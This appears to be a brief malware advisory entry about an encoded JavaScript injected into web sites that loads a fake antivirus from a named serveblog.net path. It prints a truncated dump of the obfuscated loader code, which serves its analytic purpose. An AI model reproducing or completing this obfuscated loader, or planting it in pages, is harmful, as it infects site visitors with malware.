Description:
This encoded javascript loads malware (the fake AV) from:
*.ars3000.serveblog.net/ml.php
(and other domains)
Affecting:
Any web site (no specific target).
Malware dump:
var j2uDDQZe = "vkUbq18vkUbq32";var XEjdj4Tx0 = "vkUbq3cvkUbq73vkUbq63vkUbq72vk..
var WCHGKCVL = unescape;var j2uDDQZe = "N2Yaf18IMU0732";w9221 = this;var VFzBJT9l=w9221["WJd5GoGJc2uG5mJGe2JnltJ"..